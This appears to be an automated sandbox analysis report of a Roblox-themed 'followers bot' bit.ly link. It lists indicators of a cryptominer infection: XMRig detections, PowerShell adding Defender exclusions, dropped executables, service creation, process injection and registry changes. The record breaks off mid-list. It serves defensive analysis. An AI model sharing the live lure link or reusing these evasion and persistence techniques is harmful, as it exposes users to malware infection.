Analysis
-
max time kernel
335s -
max time network
331s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
27/10/2024, 11:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://bit.ly/followersbot_rblx
Resource
win10ltsc2021-20241023-en
General
-
Target
https://bit.ly/followersbot_rblx
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1784 created 600 1784 powershell.EXE 5 PID 5400 created 600 5400 powershell.EXE 5 PID 7068 created 600 7068 powershell.EXE 5 PID 5664 created 600 5664 powershell.EXE 5 PID 3464 created 5688 3464 svchost.exe 237 -
Xmrig family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/760-649-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/760-642-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/760-648-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/760-647-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/760-643-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/760-646-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/760-645-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2092 powershell.exe 6108 powershell.exe 5696 powershell.exe 4788 powershell.exe 1784 powershell.EXE 5400 powershell.EXE 7068 powershell.EXE 5664 powershell.EXE -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 14 IoCs
pid Process 5904 9SHCODL.exe 6088 9SHCODL.exe 2356 tonbcjgtfgwe.exe 2408 A9LDCODL.exe 5276 A9LDCODL.exe 5816 A9LDCODL.exe 5708 9SHCODL.exe 1788 9SHCODL.exe 7144 A9LDCODL.exe 4924 A9LDCODL.exe 6592 tonbcjgtfgwe.exe 5688 A9LDCODL.exe 4376 A9LDCODL.exe 1072 A9LDCODL.exe -
Loads dropped DLL 64 IoCs
pid Process 6028 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 2408 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 5816 A9LDCODL.exe 4924 A9LDCODL.exe 4924 A9LDCODL.exe 4924 A9LDCODL.exe 4924 A9LDCODL.exe 4924 A9LDCODL.exe 4924 A9LDCODL.exe 4924 A9LDCODL.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Tasks\dialersvc64 svchost.exe File opened for modification C:\Windows\system32\MRT.exe tonbcjgtfgwe.exe File opened for modification C:\Windows\system32\MRT.exe 9SHCODL.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\MRT.exe 9SHCODL.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe tonbcjgtfgwe.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 5904 set thread context of 5532 5904 9SHCODL.exe 143 PID 2356 set thread context of 6048 2356 tonbcjgtfgwe.exe 171 PID 2356 set thread context of 6104 2356 tonbcjgtfgwe.exe 172 PID 2356 set thread context of 760 2356 tonbcjgtfgwe.exe 173 PID 1784 set thread context of 5368 1784 powershell.EXE 176 PID 5400 set thread context of 3700 5400 powershell.EXE 178 PID 5708 set thread context of 6472 5708 9SHCODL.exe 207 PID 6592 set thread context of 6268 6592 tonbcjgtfgwe.exe 230 PID 7068 set thread context of 5312 7068 powershell.EXE 233 PID 5664 set thread context of 3340 5664 powershell.EXE 234 -
resource yara_rule behavioral1/memory/760-636-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-649-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-642-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-648-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-647-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-643-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-641-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-639-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-646-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-645-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-640-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/760-637-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2b12a2bb-9197-427f-bdee-328153f6caeb.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241027114144.pma setup.exe -
Launches sc.exe 26 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1168 sc.exe 3524 sc.exe 5152 sc.exe 5604 sc.exe 5196 sc.exe 648 sc.exe 5920 sc.exe 6028 sc.exe 5032 sc.exe 704 sc.exe 5944 sc.exe 880 sc.exe 4520 sc.exe 5160 sc.exe 4492 sc.exe 2664 sc.exe 6972 sc.exe 6464 sc.exe 4988 sc.exe 5432 sc.exe 4684 sc.exe 3632 sc.exe 5984 sc.exe 6648 sc.exe 2888 sc.exe 3052 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0002000000043e3d-1515.dat pyinstaller -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3564 timeout.exe 2368 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730029393" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE -
Modifies registry class 27 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Explorer.EXE -
Opens file in notepad (likely ransom note) 4 IoCs
pid Process 240 NOTEPAD.EXE 4436 NOTEPAD.EXE 7064 NOTEPAD.EXE 1736 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1620 msedge.exe 1620 msedge.exe 4660 msedge.exe 4660 msedge.exe 3944 identity_helper.exe 3944 identity_helper.exe 4152 msedge.exe 4152 msedge.exe 5904 9SHCODL.exe 6108 powershell.exe 6108 powershell.exe 6108 powershell.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 5904 9SHCODL.exe 2356 tonbcjgtfgwe.exe 1784 powershell.EXE 1784 powershell.EXE 1784 powershell.EXE 5696 powershell.exe 5696 powershell.exe 5696 powershell.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 2356 tonbcjgtfgwe.exe 5400 powershell.EXE 5400 powershell.EXE 5400 powershell.EXE 1784 powershell.EXE 5368 dllhost.exe 5368 dllhost.exe 5368 dllhost.exe 5368 dllhost.exe 5368 dllhost.exe 5368 dllhost.exe 5368 dllhost.exe 5368 dllhost.exe 5400 powershell.EXE 5368 dllhost.exe 5368 dllhost.exe 5400 powershell.EXE 5400 powershell.EXE 5368 dllhost.exe 5368 dllhost.exe 760 dialer.exe 760 dialer.exe 760 dialer.exe 760 dialer.exe 5368 dllhost.exe 5368 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3536 Explorer.EXE 3256 taskhostw.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 2424 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2424 AUDIODG.EXE Token: SeRestorePrivilege 5604 7zG.exe Token: 35 5604 7zG.exe Token: SeSecurityPrivilege 5604 7zG.exe Token: SeSecurityPrivilege 5604 7zG.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeIncreaseQuotaPrivilege 6108 powershell.exe Token: SeSecurityPrivilege 6108 powershell.exe Token: SeTakeOwnershipPrivilege 6108 powershell.exe Token: SeLoadDriverPrivilege 6108 powershell.exe Token: SeSystemProfilePrivilege 6108 powershell.exe Token: SeSystemtimePrivilege 6108 powershell.exe Token: SeProfSingleProcessPrivilege 6108 powershell.exe Token: SeIncBasePriorityPrivilege 6108 powershell.exe Token: SeCreatePagefilePrivilege 6108 powershell.exe Token: SeBackupPrivilege 6108 powershell.exe Token: SeRestorePrivilege 6108 powershell.exe Token: SeShutdownPrivilege 6108 powershell.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeSystemEnvironmentPrivilege 6108 powershell.exe Token: SeRemoteShutdownPrivilege 6108 powershell.exe Token: SeUndockPrivilege 6108 powershell.exe Token: SeManageVolumePrivilege 6108 powershell.exe Token: 33 6108 powershell.exe Token: 34 6108 powershell.exe Token: 35 6108 powershell.exe Token: 36 6108 powershell.exe Token: SeDebugPrivilege 1784 powershell.EXE Token: SeDebugPrivilege 5696 powershell.exe Token: SeAssignPrimaryTokenPrivilege 5696 powershell.exe Token: SeIncreaseQuotaPrivilege 5696 powershell.exe Token: SeSecurityPrivilege 5696 powershell.exe Token: SeTakeOwnershipPrivilege 5696 powershell.exe Token: SeLoadDriverPrivilege 5696 powershell.exe Token: SeSystemtimePrivilege 5696 powershell.exe Token: SeBackupPrivilege 5696 powershell.exe Token: SeRestorePrivilege 5696 powershell.exe Token: SeShutdownPrivilege 5696 powershell.exe Token: SeSystemEnvironmentPrivilege 5696 powershell.exe 